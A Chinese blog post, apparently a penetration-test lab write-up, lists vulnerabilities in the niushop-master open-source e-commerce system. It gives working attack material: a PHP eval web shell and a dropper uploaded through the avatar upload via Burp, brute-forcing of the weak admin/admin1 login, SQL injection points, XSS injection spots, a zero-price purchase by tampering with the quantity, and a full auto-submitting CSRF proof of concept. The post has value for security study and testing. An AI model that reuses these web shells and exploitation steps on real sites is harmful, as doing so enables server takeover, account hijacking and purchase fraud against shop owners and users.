首页 > 其他分享 >niushop-master开源商场漏洞

niushop-master开源商场漏洞

时间:2024-12-23 19:57:42浏览次数:6  
标签:修改 -- 漏洞 开源 master BP php 抓包 niushop

文件上传漏洞

有很多地方都存在文件上传;有的地方是要校验,加一个GIF89a就可以绕过

先注册一个账号

来到个人信息修改个人头像

选择我们的马

#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php 
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); 
?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

弱口令

使用BP抓包

在用户名和密码位添加payload

payload设置;选择我们的字典

开始攻击

得出用户名密码

#用户名
admin
#密码
admin1

成功登录

SQL注入漏洞

基于布尔时间盲注

第一个存在点

sqlmap跑出来的

第二个存在点

二次外带注入

XSS漏洞

存储型

1.后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

2.后台-->网站--->广告位

反射型

1.后台--微信--消息管理素材管理-->添加消息存储-->标题

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为0.00000001

一共修改两次

后面全部放行就OK了

CSRF漏洞

下载源码;制作修改用户信息链接

修改用户信息

BP抓包;制作SCRF

复制下来制作链接

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://172.16.1.195/niushop/index.php?s=/member/person" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user&#95;name" value="bbbcdff" />
      <input type="hidden" name="real&#95;name" value="11wsdasa" />
      <input type="hidden" name="birthday" value="1970&#45;01&#45;01" />
      <input type="hidden" name="location" value="&apos;onclick&#61;&apos;alert&#40;1&#41;&apos;" />
      <input type="hidden" name="user&#95;qq" value="2461" />
      <input type="hidden" name="act" value="act&#95;edit&#95;profile" />
      <input type="hidden" name="submit" value="ç&#161;&#174;è&#174;&#164;ä&#191;&#174;æ&#148;&#185;å&#159;ºæ&#156;&#172;ä&#191;&#161;æ&#129;&#175;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

用户在已登录的状态点击我们的链接

标签:修改,--,漏洞,开源,master,BP,php,抓包,niushop
From: https://blog.csdn.net/2302_80256359/article/details/144676181

相关文章

  • 【开源免费】基于Vue和SpringBoot的厨艺交流平台(附论文)
    本文项目编号T104,文末自助获取源码\color{red}{T104,文末自助获取源码}......
  • 【开源免费】基于Vue和SpringBoot的网上摄影工作室系统(附论文)
    本文项目编号T103,文末自助获取源码\color{red}{T103,文末自助获取源码}......
  • 又一本开源免费的大模型书来了,449页pdf!
    介绍《自然语言处理:大模型理论实践》(预览版)一书以自然语言处理中语言模型为主线,涵盖了从基础理论到高级应用的全方位内容,逐步引导读者从基础的自然语言处理技术走向大模型的深度学习与实际应用。自然语言处理一直是人工智能最热门的应用研究领域,对科学技术、文化教育、......
  • 开源轻量级IM框架MobileIMSDK的鸿蒙NEXT客户端库已发布
    一、基本介绍MobileIMSDK-鸿蒙端是一套基于鸿蒙Next(纯血鸿蒙)系统的IM即时通讯客户端库:1)超轻量级(编译后库文件仅50KB)、无任何第3方库依赖(开箱即用);2)纯ArkTS编写、无Native代码、高度提炼、简单易用;3)基于鸿蒙Next标准WebSocket API,简洁优雅;4)可运行于任何支持鸿蒙Next的平台......
  • 一款基于 Vue + SpringBoot 前后端分离的开源博客系统!
    大家好,我是Java陈序员。今天,给大家介绍一款基于Vue+SpringBoot前后端分离的开源博客系统!关注微信公众号:【Java陈序员】,获取开源项目分享、AI副业分享、超200本经典计算机电子书籍等。项目介绍shiyi-blog——拾壹博客,一款基于Vue+SpringBoot前后端分离的博客系统,......
  • INFINI Labs 产品更新 | Console/Gateway/Agent 等产品开源发布首个版本
    INFINILabs产品又更新啦~,包括Easysearchv1.9.0、Gateway、Console、Agent、Loadgenv1.27.0。本次各产品更新了很多亮点功能,如Easysearch优化了多版本兼容配置;Console/Gateway/Agent/Loadgen及Framework开源后,发布首个重大更新版本,支持过期元数据删除,指标图表懒加载,指标......
  • 【原创】xenomai环境下开源实时数控系统LinuxCNC编译安装
    linuxcnc在xenomai下的构建简单记录,参考链接https://www.linuxcnc.org/docs/devel/html/code/building-linuxcnc.html1.环境软硬件环境桌面环境:Ubuntu24.04+xenomai3.3硬件:rk3588(nanoPiR6/T6)对xenomai内核要求要在使linuxcnc在xenomai上运行,内核配置Localversion必须是-......
  • KubeHound:开源流量攻击图生成工具
    在云计算时代,Kubernetes已成为容器编排的事实标准。然而,随着其普及,Kubernetes集群的安全性问题也日益凸显。为了应对这一挑战,DataDog推出了KubeHound,一个创新的开源工具,旨在通过生成攻击图来增强Kubernetes集群的安全性。项目地址见文末。项目理念KubeHound是一个专为......
  • 【一款超好用的开源笔记Logseq本地Docker部署与远程使用指南】
    ......
  • 推荐一个开源大模型呼叫中心系统FreeAICC
    推荐一个开源大模型呼叫中心系统FreeAICC在当今这个快节奏、高效率的商业环境中,企业与客户之间的有效沟通成为了决定业务成败的关键因素之一。为了帮助企业精准触达目标客户,提升服务效率与质量,我们找到了这个开源大模型呼叫中心系统——一款集智能外呼、呼入机器人、人工坐席......